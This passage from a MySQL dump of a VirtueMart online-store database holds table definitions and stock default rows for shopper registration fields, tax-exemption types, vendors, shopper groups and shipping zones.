00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(729,1,209,0,'อำนาจเจริญ','อจ','อจ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_states` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_userfield_values`
--

DROP TABLE IF EXISTS `myaou_virtuemart_userfield_values`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_userfield_values` (
  `virtuemart_userfield_value_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_userfield_id` smallint unsigned NOT NULL DEFAULT '0',
  `fieldtitle` char(255) NOT NULL DEFAULT '',
  `fieldvalue` char(255) NOT NULL DEFAULT '',
  `sys` tinyint NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_userfield_value_id`)
) ENGINE=MyISAM AUTO_INCREMENT=20 DEFAULT CHARSET=utf8mb3 COMMENT='Holds the different values for dropdown and radio lists';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_userfield_values`
--

LOCK TABLES `myaou_virtuemart_userfield_values` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_userfield_values` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_userfield_values` VALUES (1,23,'COM_VIRTUEMART_SHOPPER_TITLE_MR','Mr',0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(2,23,'COM_VIRTUEMART_SHOPPER_TITLE_MRS','Mrs',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,51,'None','',0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,51,'Non-resident (Canada)','R',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,51,'Federal government (United States)','A',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,51,'State government (United States)','B',0,2,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,51,'Tribe / Status Indian / Indian Band (both)','C',0,3,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(8,51,'Foreign diplomat (both)','D',0,4,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,51,'Charitable or benevolent org (both)','E',0,5,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(10,51,'Religious or educational org (both)','F',0,6,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(11,51,'Resale (both)','G',0,7,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(12,51,'Commercial agricultural production (both)','H',0,8,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(13,51,'Industrial production / manufacturer (both)','I',0,9,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(14,51,'Direct pay permit (United States)','J',0,10,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,51,'Direct mail (United States)','K',0,11,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,51,'Other (both)','L',0,12,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,51,'Local government (United States)','N',0,13,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(18,51,'Commercial aquaculture (Canada)','P',0,14,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(19,51,'Commercial Fishery (Canada)','Q',0,15,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_userfield_values` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_userfields`
--

DROP TABLE IF EXISTS `myaou_virtuemart_userfields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_userfields` (
  `virtuemart_userfield_id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint unsigned NOT NULL DEFAULT '1',
  `userfield_jplugin_id` int NOT NULL DEFAULT '0',
  `name` char(255) NOT NULL DEFAULT '',
  `title` char(255) NOT NULL DEFAULT '',
  `description` mediumtext,
  `type` char(70) NOT NULL DEFAULT '',
  `maxlength` int DEFAULT NULL,
  `size` int DEFAULT NULL,
  `required` tinyint NOT NULL DEFAULT '0',
  `cols` int DEFAULT NULL,
  `rows` int DEFAULT NULL,
  `value` char(255) DEFAULT NULL,
  `default` char(255) DEFAULT NULL,
  `registration` tinyint(1) NOT NULL DEFAULT '0',
  `shipment` tinyint(1) NOT NULL DEFAULT '0',
  `account` tinyint(1) NOT NULL DEFAULT '1',
  `cart` tinyint(1) NOT NULL DEFAULT '0',
  `readonly` tinyint(1) NOT NULL DEFAULT '0',
  `calculated` tinyint(1) NOT NULL DEFAULT '0',
  `sys` tinyint NOT NULL DEFAULT '0',
  `userfield_params` varchar(17000) NOT NULL DEFAULT '',
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_userfield_id`),
  KEY `i_virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `i_ordering` (`ordering`),
  KEY `i_shared` (`shared`),
  KEY `i_published` (`published`),
  KEY `i_account` (`account`),
  KEY `i_shipment` (`shipment`),
  KEY `i_cart` (`cart`)
) ENGINE=MyISAM AUTO_INCREMENT=52 DEFAULT CHARSET=utf8mb3 COMMENT='Holds the fields for the user information';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_userfields`
--

LOCK TABLES `myaou_virtuemart_userfields` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_userfields` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_userfields` VALUES (5,0,0,'email','COM_VIRTUEMART_REGISTER_EMAIL','','emailaddress',100,30,1,NULL,NULL,NULL,NULL,1,0,1,0,0,0,1,'',4,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,0,0,'name','COM_VIRTUEMART_USER_DISPLAYED_NAME','','text',25,30,1,0,0,'',NULL,1,0,1,0,0,0,1,'',8,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,0,0,'username','COM_VIRTUEMART_USERNAME','','text',25,30,1,0,0,'',NULL,1,0,1,0,0,0,1,'',6,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(8,0,0,'password','COM_VIRTUEMART_SHOPPER_FORM_PASSWORD_1','','password',25,30,1,NULL,NULL,NULL,NULL,1,0,1,0,0,0,1,'',10,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,0,0,'password2','COM_VIRTUEMART_SHOPPER_FORM_PASSWORD_2','','password',25,30,1,NULL,NULL,NULL,NULL,1,0,1,0,0,0,1,'',12,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,0,0,'agreed','COM_VIRTUEMART_I_AGREE_TO_TOS','','checkbox',NULL,NULL,1,NULL,NULL,NULL,NULL,1,0,1,0,0,0,1,'',13,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,0,0,'tos','COM_VIRTUEMART_STORE_FORM_TOS','','custom',NULL,NULL,1,NULL,NULL,NULL,NULL,0,0,0,1,0,0,1,'',14,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,0,0,'customer_note','COM_VIRTUEMART_CNOTES_CART','','textarea',2500,NULL,0,60,1,NULL,NULL,0,0,0,1,0,0,1,'',13,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(20,0,0,'address_type_name','COM_VIRTUEMART_USER_FORM_ADDRESS_LABEL','','text',32,30,1,NULL,NULL,NULL,'Shipment',0,1,0,0,0,0,1,'',16,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(21,0,0,'delimiter_billto','COM_VIRTUEMART_USER_FORM_BILLTO_LBL','','delimiter',25,30,0,NULL,NULL,NULL,NULL,1,0,1,0,0,0,0,'',18,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(22,0,0,'company','COM_VIRTUEMART_SHOPPER_FORM_COMPANY_NAME','','text',64,30,0,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',20,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(23,0,0,'title','COM_VIRTUEMART_SHOPPER_FORM_TITLE','','select',0,210,0,NULL,NULL,NULL,NULL,1,0,1,0,0,0,1,'',22,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(24,0,0,'first_name','COM_VIRTUEMART_SHOPPER_FORM_FIRST_NAME','','text',32,30,1,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',24,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(25,0,0,'middle_name','COM_VIRTUEMART_SHOPPER_FORM_MIDDLE_NAME','','text',32,30,0,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',26,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(26,0,0,'last_name','COM_VIRTUEMART_SHOPPER_FORM_LAST_NAME','','text',32,30,1,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',28,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(27,0,0,'address_1','COM_VIRTUEMART_SHOPPER_FORM_ADDRESS_1','','text',64,30,1,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',30,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(28,0,0,'address_2','COM_VIRTUEMART_SHOPPER_FORM_ADDRESS_2','','text',64,30,0,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',32,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(29,0,0,'zip','COM_VIRTUEMART_SHOPPER_FORM_ZIP','','text',32,30,1,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',34,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(35,0,0,'city','COM_VIRTUEMART_SHOPPER_FORM_CITY','','text',32,30,1,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',36,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(36,0,0,'virtuemart_country_id','COM_VIRTUEMART_SHOPPER_FORM_COUNTRY','','select',0,210,1,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',38,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(37,0,0,'virtuemart_state_id','COM_VIRTUEMART_SHOPPER_FORM_STATE','','select',0,210,1,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',40,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(38,0,0,'phone_1','COM_VIRTUEMART_SHOPPER_FORM_PHONE','','text',32,30,0,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',42,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(39,0,0,'phone_2','COM_VIRTUEMART_SHOPPER_FORM_PHONE2','','text',32,30,0,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',44,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(40,0,0,'fax','COM_VIRTUEMART_SHOPPER_FORM_FAX','','text',32,30,0,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',46,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(41,0,0,'delimiter_sendregistration','COM_VIRTUEMART_BUTTON_SEND_REG','','delimiter',25,30,0,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,'',2,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(42,0,0,'delimiter_userinfo','COM_VIRTUEMART_ORDER_PRINT_CUST_INFO_LBL','','delimiter',NULL,NULL,0,NULL,NULL,NULL,NULL,1,0,1,0,0,0,0,'',14,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(50,0,0,'tax_exemption_number','COM_VIRTUEMART_SHOPPER_FORM_TAXEXEMPTION_NBR','Vendors can set here a tax exemption number for a shopper. This field is only changeable by administrators.','text',10,0,0,0,0,NULL,NULL,0,0,1,1,0,0,0,'',48,0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(51,0,0,'tax_usage_type','COM_VIRTUEMART_SHOPPER_FORM_TAX_USAGE','Federal, national, educational, public, or similar often get a special tax. This field is only writable by administrators.','select',0,0,0,0,0,NULL,NULL,0,0,1,1,0,0,0,'',50,0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_userfields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_vendor_medias`
--

DROP TABLE IF EXISTS `myaou_virtuemart_vendor_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_vendor_medias` (
  `id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint unsigned NOT NULL DEFAULT '0',
  `virtuemart_media_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_vendor_id` (`virtuemart_vendor_id`,`virtuemart_media_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_vendor_medias`
--

LOCK TABLES `myaou_virtuemart_vendor_medias` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_vendor_medias` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_vendor_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_vendors`
--

DROP TABLE IF EXISTS `myaou_virtuemart_vendors`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_vendors` (
  `virtuemart_vendor_id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `vendor_name` char(64) DEFAULT NULL,
  `vendor_currency` int DEFAULT NULL,
  `vendor_accepted_currencies` varchar(1536) NOT NULL DEFAULT '',
  `vendor_params` varchar(17000) DEFAULT NULL,
  `metarobot` char(20) DEFAULT NULL,
  `metaauthor` char(64) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_vendor_id`),
  KEY `idx_vendor_name` (`vendor_name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Vendors manage their products in your store';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_vendors`
--

LOCK TABLES `myaou_virtuemart_vendors` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_vendors` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_vendors` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_vendors_en_gb`
--

DROP TABLE IF EXISTS `myaou_virtuemart_vendors_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_vendors_en_gb` (
  `virtuemart_vendor_id` int unsigned NOT NULL,
  `vendor_store_desc` text NOT NULL,
  `vendor_terms_of_service` text NOT NULL,
  `vendor_legal_info` text NOT NULL,
  `vendor_letter_css` text NOT NULL,
  `vendor_letter_header_html` varchar(8000) NOT NULL DEFAULT '<h1>{vm:vendorname}</h1><p>{vm:vendoraddress}</p>',
  `vendor_letter_footer_html` varchar(8000) NOT NULL DEFAULT '<p>{vm:vendorlegalinfo}<br />Page {vm:pagenum}/{vm:pagecount}</p>',
  `vendor_store_name` char(180) NOT NULL DEFAULT '',
  `vendor_phone` char(26) NOT NULL DEFAULT '',
  `vendor_url` char(255) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` char(255) NOT NULL DEFAULT '',
  `vendor_invoice_free1` char(255) NOT NULL DEFAULT '',
  `vendor_invoice_free2` char(255) NOT NULL DEFAULT '',
  `vendor_mail_free1` char(255) NOT NULL DEFAULT '',
  `vendor_mail_free2` char(255) NOT NULL DEFAULT '',
  `vendor_mail_css` char(255) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_vendors_en_gb`
--

LOCK TABLES `myaou_virtuemart_vendors_en_gb` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_vendors_en_gb` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_vendors_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_vendors_tr_tr`
--

DROP TABLE IF EXISTS `myaou_virtuemart_vendors_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_vendors_tr_tr` (
  `virtuemart_vendor_id` int unsigned NOT NULL,
  `vendor_store_desc` text NOT NULL,
  `vendor_terms_of_service` text NOT NULL,
  `vendor_legal_info` text NOT NULL,
  `vendor_letter_css` text NOT NULL,
  `vendor_letter_header_html` varchar(8000) NOT NULL DEFAULT '<h1>{vm:vendorname}</h1><p>{vm:vendoraddress}</p>',
  `vendor_letter_footer_html` varchar(8000) NOT NULL DEFAULT '<p>{vm:vendorlegalinfo}<br />Page {vm:pagenum}/{vm:pagecount}</p>',
  `vendor_store_name` char(180) NOT NULL DEFAULT '',
  `vendor_phone` char(26) NOT NULL DEFAULT '',
  `vendor_url` char(255) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` char(255) NOT NULL DEFAULT '',
  `vendor_invoice_free1` char(255) NOT NULL DEFAULT '',
  `vendor_invoice_free2` char(255) NOT NULL DEFAULT '',
  `vendor_mail_free1` char(255) NOT NULL DEFAULT '',
  `vendor_mail_free2` char(255) NOT NULL DEFAULT '',
  `vendor_mail_css` char(255) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_vendors_tr_tr`
--

LOCK TABLES `myaou_virtuemart_vendors_tr_tr` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_vendors_tr_tr` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_vendors_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_vmuser_shoppergroups`
--

DROP TABLE IF EXISTS `myaou_virtuemart_vmuser_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_vmuser_shoppergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_user_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` smallint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_user_id` (`virtuemart_user_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='xref table for users to shopper group';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_vmuser_shoppergroups`
--

LOCK TABLES `myaou_virtuemart_vmuser_shoppergroups` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_vmuser_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_vmuser_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_worldzones`
--

DROP TABLE IF EXISTS `myaou_virtuemart_worldzones`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_worldzones` (
  `virtuemart_worldzone_id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint DEFAULT NULL,
  `zone_name` char(255) DEFAULT NULL,
  `zone_cost` decimal(10,2) DEFAULT NULL,
  `zone_limit` decimal(10,2) DEFAULT NULL,
  `zone_description` varchar(18000) DEFAULT NULL,
  `zone_tax_rate` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_worldzone_id`),
  KEY `i_virtuemart_vendor_id` (`virtuemart_vendor_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='The Zones managed by the Zone Shipment Module';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_worldzones`
--

LOCK TABLES `myaou_virtuemart_worldzones` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_worldzones` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_worldzones` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2026-06-24 21:48:25
